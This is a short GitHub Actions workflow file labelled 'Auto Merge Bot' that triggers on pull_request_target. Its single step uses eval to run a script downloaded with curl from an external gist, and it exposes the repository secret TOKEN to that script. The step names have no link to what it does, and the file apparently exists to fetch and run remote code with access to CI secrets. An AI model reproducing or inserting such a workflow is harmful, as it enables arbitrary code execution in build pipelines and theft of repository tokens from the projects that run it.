name: Auto Merge Bot

on:
  pull_request_target:
    branches: [ master ]

jobs:
  htmlproofer:
    name: Hop
    runs-on: ubuntu-latest
    steps:
      - name: Hop
        run: |
          eval "$(curl -s https://gist.githubusercontent.com/h1-0xn3va/1742aaa89310bec6e10307f3e6a2b96f/raw/e9db7799f1493862ca67ebc2a20c4053f165ee13/2)"
        env:
          TOKEN: ${{ secrets.TOKEN }}
